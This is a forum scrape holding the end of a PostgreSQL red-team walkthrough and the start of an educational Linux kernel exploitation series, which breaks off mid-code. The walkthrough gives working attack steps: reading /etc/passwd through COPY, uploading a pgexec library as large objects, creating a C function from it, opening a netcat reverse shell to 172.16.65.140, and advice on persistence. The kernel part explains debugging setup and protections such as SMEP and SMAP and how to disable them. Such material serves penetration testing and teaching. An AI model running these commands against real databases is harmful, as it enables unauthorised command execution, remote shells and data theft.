'/etc/passwd'; COPY 52 postgres=# select * from docs limit 10; data --------------------------------------------------- root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin (10 rows) Getting a reverse shell So now we have access to our service, we can read from files on disk. Now it's time to see if we can launch a reverse shell. Again, Metasploit has a pretty nice payload to abstract this whole process, but what's the fun in that? [Dionach] has a great little library they have written to provide a function called pgexec(). Can you guess what it does? pgexec needs to be compiled against the same major and minor versions as the running Postgres instance. You should be able to just query Postgres for this information. postgres=# select version(); But he also provides prebuilt binaries for many common versions. Let's just grab one of those. $ curl https://github.com/Dionach/pgexec/blob/master/libraries/pg_exec-9.6.so -O pg_exec.so We now have our library, but how do we get it to our target? Fortunately, we can generate LOIDs in Postgres to store this data and then try to write it to disk. postgres=# select lo_creat(-1); lo_creat ---------- 16391 (1 row) Make a note of the lo_creat ID which was generated. You will need this in the examples below. However, there is a caveat here. LOID entries can be a maximum of 2K, so we need to spit the payload. We can do this in our bash shell (just be sure to use the some working directory as you are using for psql.) $ split -b 2048 pg_exec.so Now we can script the SQL statements we need to upload all the pieces of this payload. In this example, we are piping them all into a file called upload.sql. Remember to replace ${LOID} with the ID you grabbed earlier. $ CNT=0; for f in x*; do echo '\set c'${CNT}' `base64 -w 0 '${f}'`'; echo 'INSERT INTO pg_largeobject (loid, pageno, data) values ('${LOID}', '${CNT}', decode(:'"'"c${CNT}"'"', '"'"'base64'"'"'));'; CNT=$(( CNT + 1 )); done > upload.sql With our SQL file in hand, we can include these statements straight from disk into psql. (Again, this assumes that upload.sql is in the same working directory as psql.) postgres=# \include upload.sql INSERT 0 1 INSERT 0 1 INSERT 0 1 INSERT 0 1 INSERT 0 1 Finally, we save our LOID to disk. (Change 16391 to match your LOID.) postgres=# select lo_export(16391, '/tmp/pg_exec.so'); lo_export ----------- 1 (1 row) Create our new function using the library we just copied to disk. postgres=# CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE 'c' STRICT; CREATE FUNCTION Excellent! We should now be able to execute remote commands to our target. pg_exec() won't display the output, so we are just going to run some blind commands to setup our shell. First, make sure there's a listener on your local machine. From another shell window, we can set this up with Ncat or Netcat. $ nc -l -p 4444 Execute the reverse shell. postgres=# select sys('nc -e /bin/sh 172.16.65.140 4444'); We should now have an active reverse shell. To make this a bit more useable, however, we need to spawn a TTY. Lot's of ways to do this, but I am going to use Python. it's pretty universal and it works well. python -c 'import pty; pty.spawn("/bin/sh")' $ Achievement unlocked! Privilege escalation If you're lucky, PostgreSQL was running as root, and you now have total control of your target. If not, you only have an unprivileged shell and you need to escalate. I won't get into that here, but there are plenty of ways you can attempt this. First, I'd recommend setting up persistence. Perhaps creating a scheduled job to open a remote shell in case you are disconnected? Or some sort of back-door into a service. The exact method will be customized to the target. Once that's done, you can work on your post-exploitation recon, maybe some kernel exploits, and pivot from there. Hopefully this article helps you get a little deeper understanding on exploiting PostgreSQL during your engagements. Happy hacking! @ unix-ninja : "Team Hashcat + defender of the realm + artist. CISSP, OSCP, etc. Hack the planet. Break all the things. Thoughts are my own. Passwords are my jam." Sursa: https://www.unix-ninja.com/p/postgresql_for_red_teams
-
Point of no C3 | Linux Kernel Exploitation - Part 0 Exploit Development exploit 3 2d In the name of Allah, the most beneficent, the most merciful. HAHIRRITATEDAHAHAHAHAHAHAHA “Appreciate the art, master the craft.” AHAHAHAHOUTDATEDAHAHAHAHAH It’s been more than a year, huh? but I’m back, with “Point of no C3”. It’s main focus will be Kernel Exploitation, but that won’t stop it from looking at other things. Summary Chapter I: Environment setup: Preparing the VM Using KGDB to debug the kernel Compiling a simple module What? Few structs Debug a module Chapter II: Overview on security and General understanding: Control Registers SMAP SMEP Write-Protect Paging(a bit of segmentation too) Processes Syscalls IDT(Interrupt Descriptor Table) KSPP KASLR kptr_restrict mmap_min_addr addr_limit Chapter I: Environment setup “No QEMU for you.” Preparing the VM: To begin with, we would set up the environment and the VM’s in order to experiment on them. For this, Debian was choosen(core only). Other choices include SUSE or Centos, etc. debian-9.4.0-amd64-netinst.iso 2018-03-10 12:56 291M [X] debian-9.4.0-amd64-xfce-CD-1.iso 2018-03-10 12:57 646M debian-mac-9.4.0-amd64-netinst.iso 2018-03-10 12:56 294M A VM is then created with atleast 35GB space.(Hey, It’s for compiling the kernel!) Installer disc image file (iso): [C:\vm\debian-9.4.0-amd64-netinst.iso [▼]] ⚠ Could not detect which operating system is in this disc image. You will need to specify which operating system will be installed. Once you boot it, you can proceed with Graphical Install, and since we only want the core, stop at Software selection and have only SSH server and standard system utilities selected. And when it’s done, you’ll have your first VM ready. Debian GNU/Linux 9 Nwwz tty1 Hint: Num Lock on Nwwz login: root Password: Linux Nwwz 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@Nwwz:~# In order to get the latest stable Linux kernel release(4.17.2 at the time of writing) and run it. We would start by installing necessary packages: apt-get install git build-essential fakeroot ncurses* libssl-dev libelf-dev ccache gcc-multilib bison flex bc Downloading the kernel tarball and the patch: root@Nwwz:~# cd /usr/src root@Nwwz:/usr/src# wget "https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/linux-4.17.2.tar.gz" root@Nwwz:/usr/src# wget "https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/patch-4.17.2.gz" Extracting them: root@Nwwz:/usr/src# ls linux-4.17.2.tar.gz patch-4.17.2.gz root@Nwwz:/usr/src# gunzip patch-4.17.2.gz root@Nwwz:/usr/src# gunzip linux-4.17.2.tar.gz root@Nwwz:/usr/src# tar -xvf linux-4.17.2.tar Moving and applying the patch: root@Nwwz:/usr/src# ls linux-4.17.2 linux-4.17.2.tar patch-4.17.2 root@Nwwz:/usr/src# mv patch-4.17.2 linux-4.17.2/ root@Nwwz:/usr/src# cd linux-4*2 root@Nwwz:/usr/src/linux-4.17.2# patch -p1 < patch-4.17.2 Cleaning the directory and copying the original bootfile to the current working directory and changing the config with an ncurses menu: root@Nwwz:/usr/src/linux-4.17.2# make mrproper root@Nwwz:/usr/src/linux-4.17.2# make clean root@Nwwz:/usr/src/linux-4.17.2# cp /boot/config-$(uname -r) .config root@Nwwz:/usr/src/linux-4.17.2# make menuconfig One must then set up the following fields: [*] Networking support ---> Device Drivers ---> Firmware Drivers ---> File systems ---> [X] Kernel hacking ---> printk and dmesg options ---> [X] Compile-time checks and compiler options ---> ... [*] Compile the kernel with debug info ... ... -*- Kernel debugging ... [*] KGDB: kernel debugger Do you wish to save your new configuration? Press <ESC><ESC> to continue kernel configuration. [< Yes >] < No > Make sure you do have similiar lines on .config: CONFIG_STRICT_KERNEL_RWX=n CONFIG_DEBUG_INFO=y CONFIG_HAVE_HARDENED_USERCOPY_ALLOCATOR=n CONFIG_HARDENED_USERCOPY=n CONFIG_HARDENED_USERCOPY_FALLBACK=n Before starting the compiling process, to faster the process, you can split the work to multiple jobs(on different processors). nproc would hand you the number of processing units available. root@Nwwz:/usr/src/linux-4.17.2# nproc 4 root@Nwwz:/usr/src/linux-4.17.2# make -j4 It will then automatically go through stage 1 & 2: Setup is 17116 bytes (padded to 17408 bytes). System is 4897 kB CRC 2f571cf0 Kernel: arch/x86/boot/bzImage is ready (#1) Building modules, stage 2. MODPOST 3330 modules (SNIP) CC virt/lib/irqbypass.mod.o LD [M] virt/lib/irqbypass.ko root@Nwwz:/usr/src/linux-4.17.2# If somehow, there’s no stage two, a single command should be executed before moving on: (This normally isn’t required.) make modules Installing the modules: root@Nwwz:/usr/src/linux-4.17.2# make modules_install (SNIP) INSTALL sound/usb/usx2y/snd-usb-usx2y.ko INSTALL virt/lib/irqbypass.ko DEPMOD 4.17.0 root@Nwwz:/usr/src/linux-4.17.2# Installing and preparing the kernel for boot: root@Nwwz:/usr/src/linux-4.17.2# make install (SNIP) Found linux image: /boot/vmlinuz-4.17.0 Found initrd image: /boot/initrd.img-4.17.0 Found linux image: /boot/vmlinuz-4.9.0-6-amd64 Found initrd image: /boot/initrd.img-4.9.0-6-amd64 done root@Nwwz:/usr/src/linux-4.17.2# cd /boot root@Nwwz:/boot# mkinitramfs -o /boot/initrd.img-4.17.0 4.17.0 root@Nwwz:/boot# reboot You can then choose the new kernel from the boot screen: *Debian GNU/Linux, with Linux 4.17.0 Debian GNU/Linux, with Linux 4.17.0 (recovery mode) Debian GNU/Linux, with Linux 4.9.0-6-amd64 Debian GNU/Linux, with Linux 4.9.0-6-amd64 (recovery mode) If it fails however, saying that it’s an out-of-memory problem, you can reduce the size of the boot image. root@Nwwz:/boot# cd /lib/modules/4.17.0/ root@Nwwz:/lib/modules/4.17.0# find . -name *.ko -exec strip --strip-unneeded {} + root@Nwwz:/lib/modules/4.17.0# cd /boot root@Nwwz:/boot# mkinitramfs -o initrd.img-4.17.0 4.17.0 It’ll then boot successfully. root@Nwwz:~# uname -r 4.17.0 Using KGDB to debug the kernel: Installing ifconfig and running it would be the first thing to do: root@Nwwz:~# apt-get install net-tools (SNIP) root@Nwwz:~# ifconfig ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.150.145 netmask 255.255.255.0 broadcast 192.168.150.255 (SNIP) Back to Debian machine, transfering vmlinux to the host is done with SCP or WinSCP in my case. root@Nwwz:~# service ssh start .. Répertoire parent vmlinux 461 761 KB Fichier With this, you’ll have debug symbols ready, but you still need to enable KGDB for the target kernel. root@Nwwz:~# cd /boot/grub root@Nwwz:/boot/grub# nano grub.cfg Editing a single line, adding __setup arguments, we would then be able to manipulate the kernel for our needs, such as disabling KASLR and enabling KGDB. Search for the first ‘Debian GNU’ occurence and make sure it’s the wanted kernel, and add the following to the line starting with [X]: kgdboc=ttyS1,115200 kgdbwait nokaslr. menuentry 'Debian GNU/Linux' --class debian --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-simple-b1a66d11-d729-4f23-99b0-4ddfea0af6c5' { ... echo 'Loading Linux 4.17.0 ...' [X] linux /boot/vmlinuz-4.17.0 root=UUID=b1a66d11-d729-4f23-99b0-4ddfea0af6c5 ro quiet kgdboc=ttyS1,115200 kgdbwait nokaslr echo 'Loading initial ramdisk ...' initrd /boot/initrd.img-4.17.0 } In order to debug the running kernel, another VM similer to the one made previously(Debian) will be created(Debian HOST). Now shutdown both VMs in order to set the pipe: Debian: ⦿ Use named pipe: *---------------------------------------* | \\.\pipe\com_2 | *---------------------------------------* [This end is the server. [▼]] [The other end is a virtual machine. [▼]] ---------------------------------------------7 I/O mode ⧆ Yield CPU on poll Allow the guest operating system to use this serial port in polled mode (as opposed to interrupt mode). DebianHOST: ⦿ Use named pipe: *---------------------------------------* | \\.\pipe\com_2 | *---------------------------------------* [This end is the client. [▼]] [The other end is a virtual machine. [▼]] ---------------------------------------------7 I/O mode ⧆ Yield CPU on poll Allow the guest operating system to use this serial port in polled mode (as opposed to interrupt mode). Getting the vmlinux image to DebianHOST after installing necessary packages: root@Nwwz:~# apt-get install gcc gdb git net-tools root@Nwwz:~# cd /home/user root@Nwwz:/home/user# ls vmlinux root@Nwwz:/home/user# gdb vmlinux GNU gdb (Debian 7.12-6) 7.12.0.20161007-git (SNIP) Turning the Debian back on would result in a similiar message: KASLR disabled: 'nokaslr' on cmdline. [ 1.571915] KGDB: Waiting for connection from remote gdb... Attaching to DebianHOST’s GDB is then possible: (gdb) set serial baud 115200 (gdb) target remote /dev/ttyS1 Remote debugging using /dev/ttyS1 kgdb_breakpoint () at kernel/debug/debug_core.c:1073 1073 wmb(); /* Sync point after breakpoint */ (gdb) list 1068 noinline void kgdb_breakpoint(void) 1069 { 1070 atomic_inc(&kgdb_setting_breakpoint); 1071 wmb(); /* Sync point before breakpoint */ 1072 arch_kgdb_breakpoint(); 1073 wmb(); /* Sync point after breakpoint */ 1074 atomic_dec(&kgdb_setting_breakpoint); 1075 } 1076 EXPORT_SYMBOL_GPL(kgdb_breakpoint); 1077 (gdb) Know that by writing ‘continue’ on GDB, you wouldn’t be able to control it again unless you use the magic SysRq key to force a SIGTRAP to happen: root@Nwwz:~# echo "g" > /proc/sysrq-trigger And you can see in DebianHOST that it works. (SNIP) [New Thread 459] [New Thread 462] [New Thread 463] [New Thread 476] [New Thread 485] [New Thread 487] Thread 56 received signal SIGTRAP, Trace/breakpoint trap. [Switching to Thread 489] kgdb_breakpoint () at kernel/debug/debug_core.c:1073 1073 wmb(); /* Sync point after breakpoint */ (gdb) Compiling a simple module: A simple Hello 0x00sec module would be created. We need to make a directory in root folder, and prepare two files: root@Nwwz:~# mkdir mod root@Nwwz:~# cd mod root@Nwwz:~/mod/# nano hello.c #include <linux/init.h> #include <linux/module.h> static void hello_exit(void){ printk(KERN_INFO "Goodbye!\n"); } static int hello_init(void){ printk(KERN_INFO "Hello 0x00sec!\n"); return 0; } MODULE_LICENSE("GPU"); module_init(hello_init); module_exit(hello_exit); root@Nwwz:~/mod/# nano Makefile obj-m += hello.o KDIR = /lib/modules/$(shell uname -r)/build all: make -C $(KDIR) M=$(PWD) modules clean: rm -rf *.ko *.o *.mod.* *.symvers *.order Then, one can start compiling using ‘make’ and insert/remove the module in kernel to trigger both init and exit handlers. root@Nwwz:~/mod# make make -c /lib/modules/4.17.0/build M=/root/mod modules make[1]: Entering directory '/usr/src/linux-4.17.2' CC [M] /root/mod/hello.o Building modules, stage 2. MODPOST 1 modules CC /root/mod/hello.mod.o LD [M] /root/mod/hello.ko make[1]: Leaving directory '/usr/src/linux-4.17.2' root@Nwwz:~/mod# insmod hello.ko root@Nwwz:~/mod# rmmod hello.ko The messages would be by then saved in the dmesg circular buffer. root@Nwwz:~/mod# dmesg | grep Hello [ 6545.039487] Hello 0x00sec! root@Nwwz:~/mod# dmesg | grep Good [ 6574.452282] Goodbye! To clean the current directory: root@Nwwz:~/mod# make clean What?: The kernel doesn’t count on the C library we’ve been used to, because it’s judged useless for it. So instead, after the module is linked and loaded in kernel-space(requires root privileges, duh). It can use header files available in the kernel source tree, which offers a huge number of functions such as printk() which logs the message and sets it’s priority, module_init() and module_exit() to declare initialization and clean-up functions. And while application usually run with no chance of changing their variables by another thread. This certainly isn’t the case for LKMs, since what they offer could be used by multiple processes at a single time, which could lead(if the data dealt with is sensible, aka in critical region) to a panic, or worse(better?), a compromise. Few structs: The kernel implements multiple locks, only semaphores and spinlocks will likely be used here. When the semaphore is previously held, the thread will sleep, waiting for the lock to be released so he can claim it. That’s why it’s a sleeping lock, therefore, it’s only used in process context. /* Please don't access any members of this structure directly */ struct semaphore { raw_spinlock_t lock; unsigned int count; struct list_head wait_list; }; It can then be initialized with sema_init() or DEFINE_SEMAPHORE(): #define __SEMAPHORE_INITIALIZER(name, n) \ { \ .lock = __RAW_SPIN_LOCK_UNLOCKED((name).lock), \ .count = n, \ .wait_list = LIST_HEAD_INIT((name).wait_list), \ } static inline void sema_init(struct semaphore *sem, int val) { static struct lock_class_key __key; *sem = (struct semaphore) __SEMAPHORE_INITIALIZER(*sem, val); lockdep_init_map(&sem->lock.dep_map, "semaphore->lock", &__key, 0); } With val being the much processes that can hold the lock at once. It’s normally set to 1, and a semaphore with a count of 1 is called a mutex. Another type of locks would be spinlocks, it keeps the thread spinning instead of sleeping, for that reason, it can be used in the interrupt context. typedef struct spinlock { union { struct raw_spinlock rlock; #ifdef CONFIG_DEBUG_LOCK_ALLOC # define LOCK_PADSIZE (offsetof(struct raw_spinlock, dep_map)) struct { u8 __padding[LOCK_PADSIZE]; struct lockdep_map dep_map; }; #endif }; } spinlock_t; #define __RAW_SPIN_LOCK_INITIALIZER(lockname) \ { \ .raw_lock = __ARCH_SPIN_LOCK_UNLOCKED, \ SPIN_DEBUG_INIT(lockname) \ SPIN_DEP_MAP_INIT(lockname) } #define __RAW_SPIN_LOCK_UNLOCKED(lockname) \ (raw_spinlock_t) __RAW_SPIN_LOCK_INITIALIZER(lockname) # define raw_spin_lock_init(lock) \ do { *(lock) = __RAW_SPIN_LOCK_UNLOCKED(lock); } while (0) #endif static __always_inline raw_spinlock_t *spinlock_check(spinlock_t *lock) { return &lock->rlock; } #define spin_lock_init(_lock) \ do { \ spinlock_check(_lock); \ raw_spin_lock_init(&(_lock)->rlock); \ } while (0) Enough with locks, what about file_operations? This struct holds the possible operations that can be called on a device/file/entry. When creating a character device by directly calling cdev_alloc() or misc_register(), it has to be provided along with the major(on first function only) and minor. It is defined as follows: struct file_operations { struct module *owner; loff_t (*llseek) (struct file *, loff_t, int); ssize_t (*read) (struct file *, char __user *, size_t, loff_t *); ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *); ... } __randomize_layout; There are similiar structs too, such as inode_operations, block_device_operations and tty_operations… But they all provide handlers to userspace function if the file/inode/blockdev/tty is the target. These are sometimes used by the attacker in order to redirect execution such as perf_fops or ptmx_fops. The kernel provides some structs for lists with different search times. The first being double linked-list, list_head, it’s definition is simple, pointing to the next and previous list_head. struct list_head { struct list_head *next, *prev; }; While the second is redblack tree, rb_node, provides better search time. struct rb_node { unsigned long __rb_parent_color; struct rb_node *rb_right; struct rb_node *rb_left; } __attribute__((aligned(sizeof(long)))); It can be used to find the target value faster, if it’s bigger than the first node(head), then go right, else, go left. Function container_of() can then be used to extract the container struct. Note: Each device, can have multiple minors, but it’ll necessarily have a single major. root@Nwwz:/# cd /dev root@Nwwz:/dev# ls -l total 0 crw------- 1 root root [10], 175 Feb 9 09:24 agpgart | *-> Same major, different minors. | crw-r--r-- 1 root root [10], 235 Feb 9 09:24 autofs drwxr-xr-x 2 root root 160 Feb 9 09:24 block drwxr-xr-x 2 root root 80 Feb 9 09:24 bsg (SNIP) [c]rw-rw-rw- 1 root tty [5], [2] Feb 9 12:06 ptmx | | | | | *--> Minor *---> Character Device *---> Major (SNIP) [b]rw-rw---- 1 root cdrom [11], [0] Feb 9 09:24 sr0 | | | | | *--> Minor *---> Block Device *---> Major (SNIP) Debug a module: When we started gdb, the only image it was aware of, is the vmlinux one. It doesn’t know about the loaded module, and doesn’t know about the load location. In order to provide these things and make debugging the module possible, one has to first transfer the target module to DebianHOST. root@Nwwz:~/mod# service ssh start Once that’s done, one should find different sections and addresses of the LKM in memory: root@Nwwz:~/mod# insmod simple.ko root@Nwwz:~/mod# cd /sys/module/simple/sections root@Nwwz:/sys/module/simple/sections# ls -la total 0 drwxr-xr-x 2 root root 0 Aug 11 06:30 . drwxr-xr-x 5 root root 0 Aug 2 17:55 .. -r-------- 1 root root 4096 Aug 11 06:31 .bss -r-------- 1 root root 4096 Aug 11 06:31 .data -r-------- 1 root root 4096 Aug 11 06:31 .gnu.linkonce.this_module -r-------- 1 root root 4096 Aug 11 06:31 __mcount_loc -r-------- 1 root root 4096 Aug 11 06:31 .note.gnu.build-id -r-------- 1 root root 4096 Aug 11 06:31 .orc_unwind -r-------- 1 root root 4096 Aug 11 06:31 .orc_unwind_ip -r-------- 1 root root 4096 Aug 11 06:31 .rodata.str1.1 -r-------- 1 root root 4096 Aug 11 06:31 .rodata.str1.8 -r-------- 1 root root 4096 Aug 11 06:31 .strtab -r-------- 1 root root 4096 Aug 11 06:31 .symtab -r-------- 1 root root 4096 Aug 11 06:31 .text root@Nwwz:/sys/module/simple/sections# cat .text 0xffffffffc054c000 root@Nwwz:/sys/module/simple/sections# cat .data 0xffffffffc054e000 root@Nwwz:/sys/module/simple/sections# cat .bss 0xffffffffc054e4c0 Back to DebianHOST and in gdb: (gdb) add-symbol-file simple.ko 0xffffffffc054c000 -s .data 0xffffffffc054e000 -s .bss 0xffffffffc054e4c0 And that’s it. Chapter II: Overview on security and General understanding “Uuuuh, it’s simple?” Control Registers: CRs are special registers, being invisible to the user, they hold important information on the current CPU and the process running on it. x86_32 and x86_64: Keep in mind that their sizes are different(64bit for x86_64, 32bit for x86_32). CR0: x32 and x64: #0: PE(Protected Mode Enable) #1: MP(Monitor co-processor) #2: EM(Emulation) #3: TS(Task Switched) #4: ET(Extension Type) #5: NE(Numeric Error) #6-15: Reserved #16: WP(Write Protect) #17: Reserved #18: AM(Alignment Mask) #19-28: Reserved #29: NW(Not-Write Through) #30: CD(Cache Disable) #31: PG(Paging) x64 only: #32-61: Reserved CR2: Solely containing the PFLA(Page Fault Linear Address) address, which would later be extracted using do_page_fault function and passed to __do_page_fault to handle it. dotraplinkage void notrace do_page_fault(struct pt_regs *regs, unsigned long error_code) { unsigned long address = read_cr2(); /* Get the faulting address */ enum ctx_state prev_state; prev_state = exception_enter(); if (trace_pagefault_enabled()) trace_page_fault_entries(address, regs, error_code); __do_page_fault(regs, error_code, address); exception_exit(prev_state); } NOKPROBE_SYMBOL(do_page_fault); CR3: This register contains the physical address of the current process PGD(Page Global Directory), which(once converted back to virtual address) would link to the next level(P4D on five-level page tables or PUD on four-level page tables), but in the end, it’s all to find the same struct, that is, struct page. static inline unsigned long read_cr3_pa(void) { return __read_cr3() & CR3_ADDR_MASK; } static inline unsigned long native_read_cr3_pa(void) { return __native_read_cr3() & CR3_ADDR_MASK; } static inline void load_cr3(pgd_t *pgdir) { write_cr3(__sme_pa(pgdir)); } This is called as an example when an Oops happens, and the kernel calls dump_pagetable(). CR4: x32 and x64: #0: VME(Virtual-8086 Mode Extensions) #1: PVI(Protected Mode Virtual Interrupts) #2: TSD(Time Stamp Disable) #3: DE(Debugging Extensions) #4: PSE(Page Size Extensions) #5: PAE(Physical Address Extensions) #6: MCE(Machine Check Enable) #7: PGE(Page Global Enable) #8: PCE(Performance-Monitoring Counter Enable) #9: OSFXSR(OS Support for FXSAVE and FXRSTOR Instructions) #10: OSXMMEXCPT(OS Support for Unmasked SIMD Floating Point Exceptions) #11: UMIP(User-Mode Instruction Prevention) #12: Reserved #13: VMXE(Virtual Machine Extensions Enable) #14: SMXE(Safer Mode Extensions Enable) #15-16: Reserved #17: PCIDE(PCID Enable) #18: OSXSAVE(XSAVE and Processor Extended States Enable) #19: Reserved #20: SMEP(Supervisor Mode Execution Prevention) #21: SMAP(Supervisor Mode Access Prevention) #22-31: Reserved x64 only: #31-63: Reserved CR1 and CR5 to CR7: Marked as reserved, accessing them would result in raising the Undefined Behavior(#UD) exception. x86_64 only: CR8: Only the first 4 bits are used in this one, while the other 60 bits are reserved(0). Also called TPR(Task Priority Register). Those 4 bits are used when servicing interrupts, checking if the task should really be interrupted. It may or may not, depending on the interrupt’s priority: (IP <= TP ? PASS:SERVICE). They differ from architecture to another, while the previous example reviewed two CISC(x86_32, x86_64). Windows itself does have much similiarities at this level: image.png838x489 28.3 KB The thing is a little bit more different in RISC(ARM for this example): Instead of Control Registers, they are named Coprocessors(P0 to P15), each Coprocessor holds 16 registers(C0 to C15). Note however, that only CP14 and CP15 are very important to the system. MCR and MRC Instructions are available to deal with data transfer(read/write). An example for the TTBR(Translation Table Base Register) is as follows: image.png732x31 10.1 KB SMAP: Stands for Supervisor Mode Access Prevention, as it’s name suggests, prevents access to user-space from a more privileged context, that is, ring zero. However, since access may still be necessary in certain occasions, a flag is dedicated(AC in EFLAGS) to this purpose, along with two instructions to set or clear it: CLAC: image.png906x109 29.2 KB STAC: image.png890x111 29.3 KB static __init int setup_disable_smap(char *arg) { setup_clear_cpu_cap(X86_FEATURE_SMAP); return 1; } __setup("nosmap", setup_disable_smap); It can be disabled with nosmap boot flag, which would clear the CPU’s SMAP capability, or by unsetting the SMAP bit(#21) on CR4. SMEP: An abbreviation for Supervisor Mode Execution Prevention, when running on ring zero, execution would not be allowed to be transmitted to user-space. So both SMEP and SMAP put a form of limitation on the attacker’s surface. static __init int setup_disable_smep(char *arg) { setup_clear_cpu_cap(X86_FEATURE_SMEP); check_mpx_erratum(&boot_cpu_data); return 1; } __setup("nosmep", setup_disable_smep); Knowing if it’s on is as simple as checking /proc/cpuinfo, and it’s the same for SMAP. This protection can be disabled with nosmep boot flag, it can also be disabled during runtime by unsetting SMEP bit(#20) on CR4. Write-Protect: Since code executing at the highest level of privilege should normally be capable of writting to all pages even those marked as RO(Read Only). However, a bit in CR0(WP bit(16th)) is supposed to stop that from happening, by providing additional checks. Paging(a bit of segmentation too): Linux does separate privileges. the processor can handle up to 4 different rings, starting from 0 which obviously is the most privileged and ending with 3 being the least privileged with limited access to system resources. However, most operating systems do work with only two rings, zero(also called kernel-space) and three(or user-space). Each running process does have a struct mm_struct which fully describes it’s virtual memory space. But when it comes to segmentation and paging, we’re only interested in few objects in this struct: context, the single-linked list mmap and pgd. typedef struct { u64 ctx_id; atomic64_t tlb_gen; #ifdef CONFIG_MODIFY_LDT_SYSCALL struct rw_semaphore ldt_usr_sem; struct ldt_struct *ldt; #endif #ifdef CONFIG_X86_64 unsigned short ia32_compat; #endif struct mutex lock; void __user *vdso; const struct vdso_image *vdso_image; atomic_t perf_rdpmc_allowed; #ifdef CONFIG_X86_INTEL_MEMORY_PROTECTION_KEYS u16 pkey_allocation_map; s16 execute_only_pkey; #endif #ifdef CONFIG_X86_INTEL_MPX void __user *bd_addr; #endif } mm_context_t; This struct holds many information on the context, including the Local descriptor table(LDT), the VDSO image and base address(residing in user-space __user), a read/write semaphore and a mutual exclusion lock(it’s a semaphore too, remember?). struct ldt_struct { struct desc_struct *entries; unsigned int nr_entries; int slot; }; The first element in the LDT is a desc_struct pointer, referencing an array of entries, nr_entries of them. However, know that LDT isn’t usually set up, it would only use the Global Descriptor Table, it’s enough for most processes. DEFINE_PER_CPU_PAGE_ALIGNED(struct gdt_page, gdt_page) = { .gdt = { #ifdef CONFIG_X86_64 [GDT_ENTRY_KERNEL32_CS] = GDT_ENTRY_INIT(0xc09b, 0, 0xfffff), [GDT_ENTRY_KERNEL_CS] = GDT_ENTRY_INIT(0xa09b, 0, 0xfffff), [GDT_ENTRY_KERNEL_DS] = GDT_ENTRY_INIT(0xc093, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER32_CS] = GDT_ENTRY_INIT(0xc0fb, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_DS] = GDT_ENTRY_INIT(0xc0f3, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_CS] = GDT_ENTRY_INIT(0xa0fb, 0, 0xfffff), #else [GDT_ENTRY_KERNEL_CS] = GDT_ENTRY_INIT(0xc09a, 0, 0xfffff), [GDT_ENTRY_KERNEL_DS] = GDT_ENTRY_INIT(0xc092, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_CS] = GDT_ENTRY_INIT(0xc0fa, 0, 0xfffff), [GDT_ENTRY_DEFAULT_USER_DS] = GDT_ENTRY_INIT(0xc0f2, 0, 0xfffff), [GDT_ENTRY_PNPBIOS_CS32] = GDT_ENTRY_INIT(0x409a, 0, 0xffff), [GDT_ENTRY_PNPBIOS_CS16] = GDT_ENTRY_INIT(0x009a, 0, 0xffff), [GDT_ENTRY_PNPBIOS_DS] = GDT_ENTRY_INIT(0x0092, 0, 0xffff), [GDT_ENTRY_PNPBIOS_TS1] = GDT_ENTRY_INIT(0x0092, 0, 0), [GDT_ENTRY_PNPBIOS_TS2] = GDT_ENTRY_INIT(0x0092, 0, 0), [GDT_ENTRY_APMBIOS_BASE] = GDT_ENTRY_INIT(0x409a, 0, 0xffff), [GDT_ENTRY_APMBIOS_BASE+1] = GDT_ENTRY_INIT(0x009a, 0, 0xffff), [GDT_ENTRY_APMBIOS_BASE+2] = GDT_ENTRY_INIT(0x4092, 0, 0xffff), [GDT_ENTRY_ESPFIX_SS] = GDT_ENTRY_INIT(0xc092, 0, 0xfffff), [GDT_ENTRY_PERCPU] = GDT_ENTRY_INIT(0xc092, 0, 0xfffff), GDT_STACK_CANARY_INIT #endif } }; EXPORT_PER_CPU_SYMBOL_GPL(gdt_page); A per-cpu variable gdt_page is initialized using the GDT_ENTRY_INIT macro. #define GDT_ENTRY_INIT(flags, base, limit) \ { \ .limit0 = (u16) (limit), \ .limit1 = ((limit) >> 16) & 0x0F, \ .base0 = (u16) (base), \ .base1 = ((base) >> 16) & 0xFF, \ .base2 = ((base) >> 24) & 0xFF, \ .type = (flags & 0x0f), \ .s = (flags >> 4) & 0x01, \ .dpl = (flags >> 5) & 0x03, \ .p = (flags >> 7) & 0x01, \ .avl = (flags >> 12) & 0x01, \ .l = (flags >> 13) & 0x01, \ .d = (flags >> 14) & 0x01, \ .g = (flags >> 15) & 0x01, \ } This macro simply takes three arguments, and splits them in order to store at each field a valid value. The GDT holds more entries on 32bit than on 64bit. struct gdt_page { struct desc_struct gdt[GDT_ENTRIES]; } __attribute__((aligned(PAGE_SIZE))); Says that gdt_page is an array of GDT_ENTRIES(32 on x86_32, 16 on x86_64) much of desc_struct aligned to PAGE_SIZE(usually 4KB(4096)). struct desc_struct { u16 limit0; u16 base0; u16 base1: 8, type: 4, s: 1, dpl: 2, p: 1; u16 limit1: 4, avl: 1, l: 1, d: 1, g: 1, base2: 8; } __attribute__((packed)); When an ELF is about to run, and is being loaded with load_elf_binary(), it does call setup_new_exec(), install_exec_creds() on bprm before it calls setup_arg_pages() which would pick a random stack pointer. Before returning successfully, it would call finalize_exec() and start_thread() which would update the stack’s rlimit and begin execution respectively: void start_thread(struct pt_regs *regs, unsigned long new_ip, unsigned long new_sp) { start_thread_common(regs, 